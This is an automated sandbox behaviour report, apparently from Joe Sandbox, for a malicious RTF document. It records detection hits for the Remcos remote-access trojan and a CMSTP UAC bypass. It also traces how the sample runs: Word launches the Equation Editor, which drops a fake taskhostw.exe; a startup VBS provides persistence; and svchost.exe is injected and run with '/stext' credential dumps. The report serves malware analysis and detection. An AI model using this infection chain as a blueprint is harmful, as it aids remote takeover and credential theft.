Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 5_2_00D48638
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D55264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 5_2_00D55264
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_013F5264
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 7_2_004167EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044DA49 7_2_0044DA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00427AD7 7_2_00427AD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041DBF3 7_2_0041DBF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00427C40 7_2_00427C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00437DB3 7_2_00437DB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00435EEB 7_2_00435EEB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043DEED 7_2_0043DEED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00426E9F 7_2_00426E9F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10017194 7_2_10017194
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_1000B5C1 7_2_1000B5C1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\directory\name.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\taskhostw.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 013B0C63 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01397F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 013B8A80 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434E70 appears 54 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A88FF8 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A88E20 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02AA7E80 appears 42 times
Source: WC5Gv13cOQ.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: bhv41C2.tmp.9.dr Binary or memory string: org.slneighbors
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@20/22@1/3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5A0F4 GetLastError,FormatMessageW, 5_2_00D5A0F4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D484F3 AdjustTokenPrivileges,CloseHandle, 5_2_00D484F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 5_2_00D48AA3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013E84F3 AdjustTokenPrivileges,CloseHandle, 6_2_013E84F3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013E8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 6_2_013E8AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 7_2_0041798D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 5_2_00D5B3BF
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00D6EF21
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D684D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 5_2_00D684D0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 5_2_00CF4FE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 7_2_0041AADB
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$5Gv13cOQ.rtf
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7879.tmp
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\SysWOW64\svchost.exe System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 00000007.00000002.854957272.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.385921207.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000007.00000002.855231632.0000000003160000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.379045344.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: WC5Gv13cOQ.rtf ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf Virustotal: Detection: 50%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
